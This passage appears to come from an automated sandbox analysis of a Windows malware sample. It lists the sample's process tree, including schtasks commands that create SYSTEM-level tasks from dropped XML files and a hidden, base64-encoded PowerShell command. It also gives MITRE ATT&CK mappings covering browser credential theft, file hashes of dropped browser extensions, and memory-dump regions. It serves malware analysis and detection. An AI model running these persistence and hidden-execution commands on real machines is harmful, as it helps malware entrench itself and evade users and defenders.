- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "HfNDTBzsERyUD"
  2⤵
  PID:1744
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "HfNDTBzsERyUD2"
  2⤵
  PID:4944
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "HfNDTBzsERyUD2"
  2⤵
  PID:440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "CMNKInbCJBjvT"
  2⤵
  PID:516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "CMNKInbCJBjvT"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1644
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "CMNKInbCJBjvT2"
  2⤵
  PID:4544
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "CMNKInbCJBjvT2"
  2⤵
  PID:2388
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bvdTzIWqxCSEU"
  2⤵
  PID:1292
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bvdTzIWqxCSEU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bvdTzIWqxCSEU2"
  2⤵
  PID:2936
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bvdTzIWqxCSEU2"
  2⤵
  PID:4832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KJrVjFRRgteDG"
  2⤵
  PID:964
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KJrVjFRRgteDG"
  2⤵
  PID:692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KJrVjFRRgteDG2"
  2⤵
  PID:3900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KJrVjFRRgteDG2"
  2⤵
  PID:3240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "thOwFuKJdpsLdjY2" /F /xml "C:\Program Files (x86)\wLIvplUSU\fOZxZnP.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2828
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "thOwFuKJdpsLdjY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3448
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "thOwFuKJdpsLdjY"
  2⤵
  PID:4856
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XsREKGlEFTKhse" /F /xml "C:\Program Files (x86)\WJFamJaEBTfU2\bDObRRY.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2920
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "NVbWxIbBmXLBT2" /F /xml "C:\ProgramData\AjAAYqfCeAnepTVB\JYVWLPc.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2256
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "bMkGHBSdQRPgLspLe2" /F /xml "C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\sGoSwYu.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3888
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "MhGGIHasyeEkcmJHuff2" /F /xml "C:\Program Files (x86)\fnPDPsTirKjrC\wBIhviU.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2824
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 484
  2⤵
  - Program crash
  PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4580

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2308 -ip 2308
1⤵
PID:4476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\sGoSwYu.xml

Filesize
2KB

MD5
f706d2d41bfdfd8b7f15f3755f5e1c83

SHA1
d16cd0292ffe1670263ecd6f9392d03331cc792a

SHA256
cf52e033cfa75529b8c6612d8c315b2f2b49bc22050c04d46e2f03a92c7227e4

SHA512
a33e24fcc9b6d410150d83db8584e09801f60a750af58069910381a8aa2ff368aa7e457a8ef16cd47d760c7d5628938cb2d58b7c77bb556ab633b67f8cf953b1

Download Submit
C:\Program Files (x86)\WJFamJaEBTfU2\bDObRRY.xml

Filesize
2KB

MD5
60f623ccfbcfae4ea43556bc4060972b

SHA1
8bd73aee01710ded409015460efe57a758179b74

SHA256
fff26c3d42563af94008133e3f13787326cf3e99f065ef6ba53c8df3c6b38291

SHA512
7a92dd3dbd5a25a865b854b536afbfed0cb8903129f77b7a141a257fb5c7823ac62f9630354188d018f1b580a8b698d75c15d486de6c40544428bccc9cabf7a6

Download Submit
C:\Program Files (x86)\fnPDPsTirKjrC\wBIhviU.xml

Filesize
2KB

MD5
4ca176e95e3ef6b64ffc736bc5d786da

SHA1
dbbe177f2410f6477617be6a54a4b98881df6a29

SHA256
f0d6cf84b572f57adbf4420c8b99afc837847b6ff24b2e1135f2fd58c0e14d7f

SHA512
dfcaaecc836ac0a5e556ada410b2545836f355d07716f8f873356162c7ee1cb550207696b65468a98455b77215d1068f1019c24993363dfed4a017603a1ed2a8

Download Submit
C:\Program Files (x86)\wLIvplUSU\fOZxZnP.xml

Filesize
2KB

MD5
364c5fb3f4eada6006a86c0c8a787ae7

SHA1
f9ca17f7820aab380bca5f4b7a00675f68848742

SHA256
56660c19519b24d8e142288cd1fba0a3daa4883990e1b64e5418eab2b54b4db2

SHA512
1c4f1b32b4f18c07466e0d72bf274b1214446b51910a1cbd809dc2b4ecc50c9d0caa251df52aa3d75047741d6b4b137f66c5283ff2e30674698ee849341b85e0

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{C04E7587-BB46-4214-87AE-35EEE298104A}.xpi

Filesize
2.1MB

MD5
5a3513cb9e6b821c22d604d5a5cc8085

SHA1
d19e10e08b24b1473257451b02f7c2f0617d44cc

SHA256
5c286b737a484e5afb5dddc2200e4b0e9e8dc409c491351f2f20c793e4390d8e

SHA512
32bae747622eb2b1fa1456990b5e607be06967176ddfc189b58ddefea2a4167e541263d7f825a5f19a64a87f455435d08f0e64fa05bf75572ef83726ec2ad958

Download Submit
C:\ProgramData\AjAAYqfCeAnepTVB\JYVWLPc.xml

Filesize
2KB

MD5
78713da87a4aa7e66c9a23b6b6adfef6

SHA1
44e77ba0d987dab91714e8fac344593c9efe0234

SHA256
90ca3edd7fb4c1f11c151b28c73af1119f33407fb89135a2f7859e18c4dd57e4

SHA512
b3311ee3e512436a3e36c1bfc3db251557aeccfd52b08d705ed2bcf81c7e1cce1306f7f43f55bf99056ba3cb0d477cd5e1797bd824ac50fe69f9fd7b7323135a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ggjedgimacfdgfngpbbebgmhpkfnhmkd\1.0_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ggjedgimacfdgfngpbbebgmhpkfnhmkd\1.0_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ggjedgimacfdgfngpbbebgmhpkfnhmkd\1.0_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
35KB

MD5
84c1f0a5c2a3a92ed5e2fb5f9dc0e742

SHA1
06075ad5127c1971b59cc27a55ee09e55abc5730

SHA256
054d316f856bbb72e833d1a756f105c61150b0c473c44b0ff57349f37a556799

SHA512
c6af9551003a4d181c6191c9db231de2a8e1746a81a90d9a2907c36f1f46d3d6b99ec9419026111f93f71b223bc7763f9da9cbce79b692e4430e8e9fadc53c3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\mflegbodpibcglhdfhmmplcpikaapbbo\1.0_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
cc55f83e579077d8cdc5d0f579b51848

SHA1
89f4d4ba735d33d83f135262531c4ba5ccb673a6

SHA256
c2120d2218daf0d1f072729bf644c76a27a1be484ec856e3d59d0098958d7fc5

SHA512
533b1e3ad40ec01450313d35929a6622ae14014b784958528f70b00d04de80cffd2388ebd353ea0f9615f264b064df94abf6857d3cec3aefa9d802ed1375618d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
bbfa3cde57215bfc1c0b1c52fb2ff239

SHA1
7456ce718d1ddf6020d675de6c09984fa2c6a51a

SHA256
092833803f5439a6edb61a77c444bb2da318d64ce65db191b7a5ac30478c746e

SHA512
df3a1cd4337290c62d68e08974a7793cd0afa60e3595dc285599fa9cade816e2063f80c4fd4d0c962e885954f18b56fe007cb4f156b7136c890aa111f12ff66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jd3ewkvy.dec.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\prefs.js

Filesize
11KB

MD5
2fb3a953d6845c48abc1668243274bde

SHA1
35f91e8c67bfb729839d105b57e9499e031f700c

SHA256
c138d5eda737ff2b7802258c9a5702144727c26545fe84c4a37e65090677fad8

SHA512
594809287da46be90b11852a5c590788be71cedac3ddbdc56a132e6ed23befef3df29244f7fa62486af0f3551b28cb02cefd4e7e3b508f765df54c5c68c1fe24

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Filesize
7KB

MD5
0509e0d8dd9b87a36757fbd8757f20cf

SHA1
89f6ebd42b6542f99a94e0042b9d9fd59cd007fc

SHA256
87bc3e76f813bcacd17ec0bfe6640397aaaeaa50d13d1a20e50a54668225b009

SHA512
5821a4ea4748fd36a41662f73e9552faa482de313a850f8f5c747ef8eddfece50c3cea52e17c092ad6715f63b82ce2ef9b850a3691fd685ab6fb17a060f26b61

Download Submit
memory/1068-7-0x00000000048B0000-0x00000000048E6000-memory.dmp

Filesize
216KB

Download
memory/1068-10-0x00000000055B0000-0x00000000055D2000-memory.dmp

Filesize
136KB

Download
memory/1068-6-0x000000007435E000-0x000000007435F000-memory.dmp

Filesize
4KB

Download
memory/1068-23-0x0000000005DF0000-0x0000000005E0E000-memory.dmp

Filesize
120KB

Download
memory/1068-12-0x00000000057C0000-0x0000000005826000-memory.dmp

Filesize
408KB

Download
memory/1068-8-0x0000000074350000-0x0000000074B00000-memory.dmp

Filesize
7.7MB

Download
memory/1068-11-0x0000000005750000-0x00000000057B6000-memory.dmp

Filesize
408KB

Download
memory/1068-22-0x0000000005930000-0x0000000005C84000-memory.dmp

Filesize
3.3MB

Download
memory/1068-9-0x0000000004F20000-0x0000000005548000-memory.dmp

Filesize
6.2MB

Download
memory/1068-28-0x0000000074350000-0x0000000074B00000-memory.dmp

Filesize
7.7MB

Download
memory/1068-24-0x0000000006400000-0x000000000644C000-memory.dmp

Filesize
304KB

Download
memory/2308-1-0x0000000010000000-0x00000000105DB000-memory.dmp

Filesize
5.9MB

Download
memory/2308-0-0x0000000000B20000-0x00000000011B8000-memory.dmp

Filesize
6.6MB

Download
memory/2308-110-0x00000000044C0000-0x000000000451F000-memory.dmp

Filesize
380KB

Download
memory/2308-67-0x0000000003CB0000-0x0000000003D35000-memory.dmp

Filesize
532KB

Download
memory/2308-5-0x0000000010000000-0x00000000105DB000-memory.dmp

Filesize
5.9MB

Download
memory/2308-57-0x0000000010000000-0x00000000105DB000-memory.dmp

Filesize
5.9MB

Download
memory/2308-66-0x0000000003CB0000-0x0000000003D35000-memory.dmp

Filesize
532KB

Download
memory/2308-437-0x0000000004520000-0x000000000459D000-memory.dmp

Filesize
500KB

Download
memory/2308-25-0x0000000000B20000-0x00000000011B8000-memory.dmp

Filesize
6.6MB

Download
memory/2308-451-0x0000000005030000-0x00000000050FB000-memory.dmp

Filesize
812KB

Download
memory/2308-474-0x0000000010000000-0x00000000105DB000-memory.dmp

Filesize
5.9MB

Download
memory/5004-44-0x000001FADC5C0000-0x000001FADC5E2000-memory.dmp

Filesize
136KB

Download
memory/5048-39-0x0000000005590000-0x00000000058E4000-memory.dmp

Filesize
3.3MB

Download